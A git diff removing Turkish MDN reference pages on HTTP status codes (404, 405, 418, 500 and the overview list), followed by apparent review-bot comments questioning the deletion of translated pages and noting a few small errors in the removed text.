diff --git a/files/tr/web/http/status/404/index.html b/files/tr/web/http/status/404/index.html deleted file mode 100644 index 15189bdf9f..0000000000 --- a/files/tr/web/http/status/404/index.html +++ /dev/null 
@@ -1,61 +0,0 @@ ---- -title: 404 Bulunamadı -slug: Web/HTTP/Status/404 -translation_of: Web/HTTP/Status/404 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <code><strong>404 Not Found</strong></code> client error response code indicates that the server can't find the requested resource. Links which lead to a 404 page are often called broken or dead links, and can be subject to <a href="https://en.wikipedia.org/wiki/Link_rot">link rot</a>.</p> - -<p>A 404 status code does not indicate whether the resource is temporarily or permanently missing. But if a resource is permanently removed, a {{HTTPStatus("410")}} (Gone) should be used instead of a 404 status.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">404 Not Found</pre> - -<h2 id="Custom_error_pages">Custom error pages</h2> - -<p>Many web sites customize the look of a 404 page to be more helpful to the user and provide guidance on what to do next. Apache servers can be configured using an <code>.htaccess</code> file and a code snippet like the following example.</p> - -<pre class="brush: bash notranslate">ErrorDocument 404 /notfound.html</pre> - -<p>For an example of a custom 404 page, see <a href="https://developer.mozilla.org/en-US/404">MDN's 404 page</a>.</p> - -<div class="note"> -<p>Custom design is a good thing, in moderation. Feel free to make your 404 page humorous and human, but don't confuse your users.</p> -</div> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "404 Not Found" , "6.5.4")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. 
If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.404")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("410")}}</li> - <li> - <p>{{interwiki("wikipedia", "HTTP_404", "Wikipedia: HTTP 404")}}</p> - </li> - <li> - <p><a class="external" href="https://www.exai.com/blog/404-http-error" rel="noopener">404 Error </a></p> - </li> -</ul> diff --git a/files/tr/web/http/status/405/index.html b/files/tr/web/http/status/405/index.html deleted file mode 100644 index ef06ed441a..0000000000 --- a/files/tr/web/http/status/405/index.html +++ /dev/null 
@@ -1,42 +0,0 @@ ---- -title: 405 İzin Verilmeyen Metot -slug: Web/HTTP/Status/405 -tags: - - Durum kodu -translation_of: Web/HTTP/Status/405 ---- -<div>{{HTTPSidebar}}</div> - -<p>HyperText Transfer Protocol (HTTP) <code><strong>405 Method Not Allowed</strong></code> durum kodu sunucunun istek metodunu bilmesine rağmen istenen kaynak tarafından metodun desteklenmediği anlamına gelir.</p> - -<p class="newpage">Sunucu MUTLAKA <strong><code>Allow</code></strong> başlığı ile istenen kaynağın şu an desteklediği metotları listeleyen bir 405 cevabı vermelidir.</p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox notranslate">405 Method Not Allowed</pre> - -<h2 id="Detaylar">Detaylar</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "405 Method Not Allowed" , "6.5.5")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Allow")}}</li> - <li><a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" rel="noopener">HTTP/1.1: Status Code Definitions</a></li> - <li><a href="https://kinsta.com/blog/405-method-not-allowed-error/">How to Fix 405 Method Not Allowed</a></li> - <li><a href="https://docs.microsoft.com/en-us/aspnet/web-api/overview/testing-and-debugging/troubleshooting-http-405-errors-after-publishing-web-api-applications">Troubleshooting HTTP 405</a></li> -</ul> diff --git a/files/tr/web/http/status/418/index.html b/files/tr/web/http/status/418/index.html deleted file mode 100644 index 14ec22a3aa..0000000000 --- a/files/tr/web/http/status/418/index.html +++ /dev/null 
@@ -1,45 +0,0 @@ ---- -title: 418 Ben Çaydanlığım -slug: Web/HTTP/Status/418 -translation_of: Web/HTTP/Status/418 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HTTP <strong><code>418 I'm a teapot</code></strong> client error response code indicates that the server refuses to brew coffee because it is, permanently, a teapot. A combined coffee/tea pot that is temporarily out of coffee should instead return 503. This error is a reference to Hyper Text Coffee Pot Control Protocol defined in April Fools' jokes in 1998 and 2014.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">418 I'm a teapot</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("2324", "418 I'm a teapot" , "2.3.2")}}</td> - <td>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0): Semantics and Content</td> - </tr> - <tr> - <td>{{RFC("7168", "418 I'm a teapot" , "2.3.3")}}</td> - <td>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA): Response Codes</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.418")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{interwiki("wikipedia", "Hyper Text Coffee Pot Control Protocol", "Wikipedia: Hyper Text Coffee Pot Control Protocol")}}</li> -</ul> diff --git a/files/tr/web/http/status/500/index.html b/files/tr/web/http/status/500/index.html deleted file mode 100644 index 30f4e0fa77..0000000000 --- a/files/tr/web/http/status/500/index.html +++ /dev/null 
@@ -1,39 +0,0 @@ ---- -title: 500 İç Sunucu Hatası -slug: Web/HTTP/Status/500 -tags: - - Durum kodu - - HTTP - - Sunucu hatası -translation_of: Web/HTTP/Status/500 ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP <code><strong>500 İç Sunucu Hatası</strong></code> <span id="result_box" lang="tr"><span>sunucu hata yanıt kodu, sunucunun isteği yerine getirmesini engelleyen beklenmedik bir durumla karşılaştığını gösterir.</span></span></p> - -<p><span id="result_box" lang="tr"><span>Bu hata yanıtı genel bir "tümünü yakalama" yanıtıdır.</span> <span>Çoğu zaman sunucu yöneticileri, hatanın gelecekte tekrar oluşmasını önlemek için 500 durum kodu gibi hata yanıtlarını günlüğe kaydederler.</span></span></p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox">500 İç Sunucu Hatası</pre> - -<h2 id="Tanımlar">Tanımlar</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Tanım</th> - <th scope="col">Başlık</th> - </tr> - <tr> - <td>{{RFC("7231", "500 Internal Server Error" , "6.6.1")}}</td> - <td>Köprü Metni Aktarım Protokolü (HTTP / 1.1): Anlambilim ve İçerik</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.500")}}</p> diff --git a/files/tr/web/http/status/index.html b/files/tr/web/http/status/index.html deleted file mode 100644 index 68c768ecc5..0000000000 --- a/files/tr/web/http/status/index.html +++ /dev/null 
@@ -1,193 +0,0 @@ ---- -title: HTTP yanıt durumu kodları -slug: Web/HTTP/Status -tags: - - HTTP - - NeedsTranslation - - Status codes - - TopicStub -translation_of: Web/HTTP/Status ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP yanıt durumu kodları belirli bir <a href="/tr/docs/Web/HTTP">HTTP</a> isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtları beş sınıfa ayrılır:<br> - <br> - 1. Bilgilendirme yanıtları (100-199),<br> - 2. Başarı yanıtları (200-299),<br> - 3. Yönlendirmeler (300-399),<br> - 4. İstemci hataları (400-499) ve,<br> - 5. Sunucu hataları (500-599).</p> - -<p>Durum kodları<a href="https://tools.ietf.org/html/rfc2616#section-10"> RFC 2616 bölüm 10</a>'da tanımlanmıştır. Güncellenmiş bir özelliği <a href="https://tools.ietf.org/html/rfc7231#section-6.5.1">RFC 7231</a>'de bulabilirsiniz.</p> - -<div class="blockIndicator note"> -<p>Bu listede olmayan bir yanıt alırsanız, bu, muhtemelen sunucunun yazılımına özel, standart dışı bir yanıttır.</p> - -<p>Cevaplar (İngilizce) Orjinal olarak döndürüleceğinden - cevabın Türkçesi yanında verilmiştir. 
</p> -</div> - -<h2 id="Bilgilendirme_yanıtları">Bilgilendirme yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(100, "100 Continue")}} - "100 Devam et"</dt> - <dd>Bu ara cevap, şu ana kadar her şeyin yolunda gittiğini ve müşterinin isteğine devam etmesi ya da bitmişse bu bilgiyi yoksayması gerektiğini gösterir.</dd> - <dt>{{HTTPStatus(101, "101 101 Switching Protocol")}} - "101 Protokol Değiştiriliyor"</dt> - <dd>Bu kod istemci tarafından gönderilen istekteki {{HTTPHeader("Upgrade")}} başlığına yanıt olarak gönderilir ve sunucunun hangi protokole geçtiğini belirtir.</dd> - <dt>{{HTTPStatus(102, "102 Processing")}} ({{Glossary("WebDAV")}}) - "102 İşleniyor" - Sözlük("WebDAV") </dt> - <dd>Bu kod sunucunun isteği aldığını ve işlemekte olduğunu ancak henüz yanıt vermediğini bildirir.<br> - <strong>WebDAV(Web Distributed Authoring and Versioning</strong><strong>):</strong> World Wide Web sunucularında depolanmış belge ve dosyaları düzenleme ve yönetmede kullanıcılar arasında iş birliğini kolaylaştıran bir Hiper Metin Aktarım Protokolü uzantısıdır.</dd> - <dt>{{HTTPStatus(103, "103 Early Hints")}} -"103 Ön İpucu"</dt> - <dd>Bu durum kodunun esas olarak {{HTTPHeader ("Link")}} başlığıyla kullanılması amaçlanmıştır ve sunucu bir yanıt hazırlarken kullanıcı aracısının kaynakları <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTML/Preloading_content">önyüklemeye</a> başlamasını sağlar.</dd> -</dl> - -<h2 id="Başarı_yanıtları">Başarı yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(200, "200 Tamam")}}</dt> - <dd>İstek başarılı oldu. 
Buradaki başarı, HTTP metoduna göre farklı anlamlara gelir:<br> - GET: Kaynak alındı ve mesaj gövdesinde iletildi.<br> - HEAD: Varlık başlıkları mesaj gövdesindedir.<br> - PUT veya POST: Eylemin sonucunu açıklayan kaynak mesaj gövdesinde iletildi.<br> - TRACE: Mesaj gövdesinde sunucu tarafından alındığı şekliyle istek mesajı bulunuyor.</dd> - <dt>{{HTTPStatus(201, "201 Oluşturuldu")}}</dt> - <dd>"İstek başarılı oldu ve bunun sonucunda yeni bir kaynak oluşturuldu."<br> - Genellikle POST veya PUT isteklerinden sonra gönderilen yanıt budur.</dd> - <dt>{{HTTPStatus(202, "202 Kabul edildi")}}</dt> - <dd>"Talep alındı, ancak henüz işlem yapılmadı." HTTP'de daha sonra isteğin sonucunu belirten eşzamansız(asenkron) bir yanıt göndermenin bir yolu olmadığından, kesin değildir.<br> - 'Başka bir işlemin yapıldığı' veya<br> - 'Sunucunun isteği işlediği durumlar' için veya<br> - 'toplu işleme' yanıt olarak tasarlanmıştır.(toplu işleme: bir defada -bölünmeden- yapılacak işlem bloğu) </dd> - <dt>{{HTTPStatus(203, "203 Non-Authoritative Information")}} - "203 Yetkili Olmayan Bilgiler"-</dt> - <dd>Bu yanıt kodu, döndürülen meta bilginin, kaynak sunucudakiyle tam olarak aynı olmadığı, ancak yerel veya üçüncü taraf bir kopyadan toplandığı anlamına gelir. Bu özel durum haricinde, "200 OK" yanıtı tercih edilir.</dd> - <dt>{{HTTPStatus(204, "204 No Content")}} - "204 İçerik Yok"</dt> - <dd>Bu istek için gönderilecek içerik yok, ancak başlıklar faydalı olabilir. 
Kullanıcı aracısı, bu kaynak için önbelleğe alınmış başlıklarını yenileriyle güncelleyebilir.</dd> - <dt>{{HTTPStatus(205, "205 Reset Content")}} - "205 İçeriği Sıfırla"</dt> - <dd>Kullanıcı aracısına bu isteği gönderen belgeyi sıfırlamasını söyler.</dd> - <dt>{{HTTPStatus(206, "206 Partial Content")}} - "206 Kısmi İçerik"</dt> - <dd>This response code is used because of range header sent by the client to separate download into multiple streams.</dd> - <dt>{{HTTPStatus(207, "207 Multi-Status")}} ({{Glossary("WebDAV")}}) - "207 Birden fazla durum" - Sözlük("WebDAV") </dt> - <dd>Birden çok durum kodunun uygun olabileceği durumlar için birden çok kaynak hakkında bilgi aktarır.</dd> - <dt>{{HTTPStatus(208, "208 Already Reported")}} ({{Glossary("WebDAV")}}) - "208 Rapor edilmiş" - Sözlük("WebDAV") </dt> - <dd>Bir <code><dav:propstat></code> yanıt öğesinin içinde, birden çok bağlamanın dahili üyelerinin aynı koleksiyona tekrar tekrar numaralandırılmasını önlemek için kullanılır.</dd> - <dt>{{HTTPStatus(226, "226 IM Used")}} (<a href="https://tools.ietf.org/html/rfc3229">HTTP Delta şifrelemesi</a>) - "Kullanılmış IM Başlığı"</dt> - <dd>Sunucu, kaynak için bir <code>GET</code> isteğini yerine getirdi ve yanıt, geçerli örneğe uygulanan bir veya daha fazla örnek işlemenin sonucunun bir temsilidir.<br> - IM = <a href="https://tools.ietf.org/html/rfc3229#section-10.1">instance-manipulation</a> : örnek işleme</dd> -</dl> - -<h2 id="Yönlendirme_mesajları">Yönlendirme mesajları</h2> - -<dl> - <dt>{{HTTPStatus(300, "300 Multiple Choice")}}</dt> - <dd>The request has more than one possible responses. User-agent or user should choose one of them. There is no standardized way to choose one of the responses.</dd> - <dt>{{HTTPStatus(301, "301 Kalıcı Yönlendirme")}}</dt> - <dd>This response code means that URI of requested resource has been changed. 
Probably, new URI would be given in the response.</dd> - <dt>{{HTTPStatus(302, "302 Geçici Yönlendirme")}}</dt> - <dd>This response code means that URI of requested resource has been changed <em>temporarily</em>. New changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests.</dd> - <dt>{{HTTPStatus(303, "303 See Other")}}</dt> - <dd>Server sent this response to directing client to get requested resource to another URI with an GET request.</dd> - <dt>{{HTTPStatus(304, "304 Not Modified")}}</dt> - <dd>This is used for caching purposes. It is telling to client that response has not been modified. So, client can continue to use same cached version of response.</dd> - <dt><code>305 Use Proxy</code> {{deprecated_inline}}</dt> - <dd>Was defined in a previous version of the HTTP specification to indicate that a requested response must be accessed by a proxy. It has been deprecated due to security concerns regarding in-band configuration of a proxy.</dd> - <dt><code>306 unused</code></dt> - <dd>This response code is no longer used, it is just reserved currently. It was used in a previous version of the HTTP 1.1 specification.</dd> - <dt>{{HTTPStatus(307, "307 Temporary Redirect")}}</dt> - <dd>Server sent this response to directing client to get requested resource to another URI with same method that used prior request. This has the same semantic than the <code>302 Found</code> HTTP response code, with the exception that the user agent <em>must not</em> change the HTTP method used: if a <code>POST</code> was used in the first request, a <code>POST</code> must be used in the second request.</dd> - <dt>{{HTTPStatus(308, "308 Permanent Redirect")}}</dt> - <dd>This means that the resource is now permanently located at another URI, specified by the <code>Location:</code> HTTP Response header. 
This has the same semantics as the <code>301 Moved Permanently</code> HTTP response code, with the exception that the user agent <em>must not</em> change the HTTP method used: if a <code>POST</code> was used in the first request, a <code>POST</code> must be used in the second request.</dd> -</dl> - -<h2 id="İstemci_hatası_yanıtları">İstemci hatası yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(400, "400 Bad Request")}}</dt> - <dd>This response means that server could not understand the request due to invalid syntax.</dd> - <dt>{{HTTPStatus(401, "401 Unauthorized")}}</dt> - <dd>Although the HTTP standard specifies "unauthorized", semantically this response means "unauthenticated". That is, the client must authenticate itself to get the requested response.</dd> - <dt><code>402 Payment Required</code></dt> - <dd>This response code is reserved for future use. Initial aim for creating this code was using it for digital payment systems however this is not used currently.</dd> - <dt>{{HTTPStatus(403, "403 Forbidden")}}</dt> - <dd>The client does not have access rights to the content, i.e. they are unauthorized, so server is rejecting to give proper response. Unlike 401, the client's identity is known to the server.</dd> - <dt>{{HTTPStatus(404, "404 Not Found")}}</dt> - <dd>The server can not find requested resource. In the browser, this means the URL is not recognized. In an API, this can also mean that the endpoint is valid but the resource itself does not exist. Servers may also send this response instead of 403 to hide the existence of a resource from an unauthorized client. This response code is probably the most famous one due to its frequent occurence on the web.</dd> - <dt>{{HTTPStatus(405, "405 Method Not Allowed")}}</dt> - <dd>The request method is known by the server but has been disabled and cannot be used. For example, an API may forbid DELETE-ing a resource. 
The two mandatory methods, <code>GET</code> and <code>HEAD</code>, must never be disabled and should not return this error code.</dd> - <dt>{{HTTPStatus(406, "406 Not Acceptable")}}</dt> - <dd>This response is sent when the web server, after performing <a href="/en-US/docs/HTTP/Content_negotiation#Server-driven_negotiation">server-driven content negotiation</a>, doesn't find any content following the criteria given by the user agent.</dd> - <dt>{{HTTPStatus(407, "407 Proxy Authentication Required")}}</dt> - <dd>This is similar to 401 but authentication is needed to be done by a proxy.</dd> - <dt>{{HTTPStatus(408, "408 Request Timeout")}}</dt> - <dd>This response is sent on an idle connection by some servers, even without any previous request by the client. It means that the server would like to shut down this unused connection. This response is used much more since some browsers, like Chrome, Firefox 27+, or IE9, use HTTP pre-connection mechanisms to speed up surfing. Also note that some servers merely shut down the connection without sending this message.</dd> - <dt>{{HTTPStatus(409, "409 Conflict")}}</dt> - <dd>This response is sent when a request conflicts with the current state of the server.</dd> - <dt>{{HTTPStatus(410, "410 Gone")}}</dt> - <dd>This response would be sent when the requested content has been permenantly deleted from server, with no forwarding address. Clients are expected to remove their caches and links to the resource. The HTTP specification intends this status code to be used for "limited-time, promotional services". 
APIs should not feel compelled to indicate resources that have been deleted with this status code.</dd> - <dt>{{HTTPStatus(411, "411 Length Required")}}</dt> - <dd>Server rejected the request because the <code>Content-Length</code> header field is not defined and the server requires it.</dd> - <dt>{{HTTPStatus(412, "412 Precondition Failed")}}</dt> - <dd>The client has indicated preconditions in its headers which the server does not meet.</dd> - <dt>{{HTTPStatus(413, "413 Payload Too Large")}}</dt> - <dd>Request entity is larger than limits defined by server; the server might close the connection or return an <code>Retry-After</code> header field.</dd> - <dt>{{HTTPStatus(414, "414 URI Too Long")}}</dt> - <dd>The URI requested by the client is longer than the server is willing to interpret.</dd> - <dt>{{HTTPStatus(415, "415 Unsupported Media Type")}}</dt> - <dd>The media format of the requested data is not supported by the server, so the server is rejecting the request.</dd> - <dt>{{HTTPStatus(416, "416 Requested Range Not Satisfiable")}}</dt> - <dd>The range specified by the <code>Range</code> header field in the request can't be fulfilled; it's possible that the range is outside the size of the target URI's data.</dd> - <dt>{{HTTPStatus(417, "417 Expectation Failed")}}</dt> - <dd>This response code means the expectation indicated by the <code>Expect</code> request header field can't be met by the server.</dd> - <dt>{{HTTPStatus(418, "418 I'm a teapot")}}</dt> - <dd>The server refuses the attempt to brew coffee with a teapot.</dd> - <dt>{{HTTPStatus(421, "421 Misdirected Request")}}</dt> - <dd>The request was directed at a server that is not able to produce a response. 
This can be sent by a server that is not configured to produce responses for the combination of scheme and authority that are included in the request URI.</dd> - <dt>{{HTTPStatus(422, "422 Unprocessable Entity")}} ({{Glossary("WebDAV")}})</dt> - <dd>The request was well-formed but was unable to be followed due to semantic errors.</dd> - <dt>{{HTTPStatus(423, "423 Locked")}} ({{Glossary("WebDAV")}})</dt> - <dd>The resource that is being accessed is locked.</dd> - <dt>{{HTTPStatus(424, "424 Failed Dependency")}} ({{Glossary("WebDAV")}})</dt> - <dd>The request failed due to failure of a previous request.</dd> - <dt>{{HTTPStatus(426, "426 Upgrade Required")}}</dt> - <dd>The server refuses to perform the request using the current protocol but might be willing to do so after the client upgrades to a different protocol. The server sends an {{HTTPHeader("Upgrade")}} header in a 426 response to indicate the required protocol(s).</dd> - <dt>{{HTTPStatus(428, "428 Precondition Required")}}</dt> - <dd>The origin server requires the request to be conditional. Intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.</dd> - <dt>{{HTTPStatus(429, "429 Too Many Requests")}}</dt> - <dd>The user has sent too many requests in a given amount of time ("rate limiting").</dd> - <dt>{{HTTPStatus(431, "431 Request Header Fields Too Large")}}</dt> - <dd>The server is unwilling to process the request because its header fields are too large. 
The request MAY be resubmitted after reducing the size of the request header fields.</dd> - <dt>{{HTTPStatus(451, "451 Unavailable For Legal Reasons")}}</dt> - <dd>The user requests an illegal resource, such as a web page censored by a government.</dd> -</dl> - -<h2 id="Sunucu_hatası_yanıtları">Sunucu hatası yanıtları</h2> - -<dl> - <dt>{{HTTPStatus(500, "500 Internal Server Error")}}</dt> - <dd>The server has encountered a situation it doesn't know how to handle.</dd> - <dt>{{HTTPStatus(501, "501 Not Implemented")}}</dt> - <dd>The request method is not supported by the server and cannot be handled. The only methods that servers are required to support (and therefore that must not return this code) are <code>GET</code> and <code>HEAD</code>.</dd> - <dt>{{HTTPStatus(502, "502 Bad Gateway")}}</dt> - <dd>This error response means that the server, while working as a gateway to get a response needed to handle the request, got an invalid response.</dd> - <dt>{{HTTPStatus(503, "503 Service Unavailable")}}</dt> - <dd>The server is not ready to handle the request. Common causes are a server that is down for maintenance or that is overloaded. Note that together with this response, a user-friendly page explaining the problem should be sent. This responses should be used for temporary conditions and the <code>Retry-After:</code> HTTP header should, if possible, contain the estimated time before the recovery of the service. 
The webmaster must also take care about the caching-related headers that are sent along with this response, as these temporary condition responses should usually not be cached.</dd> - <dt>{{HTTPStatus(504, "504 Gateway Timeout")}}</dt> - <dd>This error response is given when the server is acting as a gateway and cannot get a response in time.</dd> - <dt>{{HTTPStatus(505, "505 HTTP Version Not Supported")}}</dt> - <dd>The HTTP version used in the request is not supported by the server.</dd> - <dt>{{HTTPStatus(506, "506 Variant Also Negotiates")}}</dt> - <dd>The server has an internal configuration error: transparent content negotiation for the request results in a circular reference.</dd> - <dt>{{HTTPStatus(507, "507 Insufficient Storage")}}</dt> - <dd>The server has an internal configuration error: the chosen variant resource is configured to engage in transparent content negotiation itself, and is therefore not a proper end point in the negotiation process.</dd> - <dt>{{HTTPStatus(508, "508 Loop Detected")}} ({{Glossary("WebDAV")}})</dt> - <dd>The server detected an infinite loop while processing the request.</dd> - <dt>{{HTTPStatus(510, "510 Not Extended")}}</dt> - <dd>Further extensions to the request are required for the server to fulfill it.</dd> - <dt>{{HTTPStatus(511, "511 Network Authentication Required")}}</dt> - <dd>The 511 status code indicates that the client needs to authenticate to gain network access.</dd> -</dl> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">List of HTTP status codes on Wikipedia</a></li> - <li><a href="http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml">IANA official registry of HTTP status codes</a></li> -</ul> |
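Review bot: nothing in this directory takes over the slug `Web/HTTP/Status/404` that the status/404/index.html hunk removes (the diffstat shows 0 insertions under files/tr/web/http), so please confirm that inbound `/tr/docs/Web/HTTP/Status/404` links still resolve, for example through a redirect to the en-US page added elsewhere in the commit. The body removed here is English text under the Turkish title "404 Bulunamadı", so no translation is lost. If any of it is carried over later, the third-party `https://www.exai.com/blog/404-http-error` entry in "See also" should not come along, and the `ErrorDocument 404 /notfound.html` snippet is Apache configuration, not `brush: bash`.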
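Review bot: the status/405/index.html hunk deletes real translation work, not an untranslated stub. Both the summary paragraph and the requirement that a 405 response must carry an `Allow` header listing the supported methods are in Turkish. If the reason for the removal is untranslated or stale content, that reason does not apply to this file. Either keep it or have the commit message say why translated pages are dropped together with the stubs.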
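Review bot: the status/500/index.html hunk also removes a fully translated page, so the same question about dropping finished translations applies. One defect to avoid if the text is ever restored: the status block reads `500 İç Sunucu Hatası`, but the status line a server sends is `500 Internal Server Error`, and the sibling pages keep the literal English phrase in their `syntaxbox`. The translated phrase belongs in the title and prose only.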
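Review bot: the status/index.html hunk removes a page tagged `NeedsTranslation` and `TopicStub` that is Turkish only through the 2xx section, with 206 and everything from 300 onward left in English, so removal is defensible. The Turkish 1xx/2xx entries are still the only translated overview of the status classes, and the commit should state whether they are preserved anywhere. If they are reused, do not copy the errors visible in this revision. The 507 Insufficient Storage entry carries a transparent-content-negotiation description that belongs to 506, and the 101 entry is labelled "101 101 Switching Protocol". The literal text `Sözlük("WebDAV")` is also left behind next to the `{{Glossary("WebDAV")}}` macro in the 102, 207 and 208 entries.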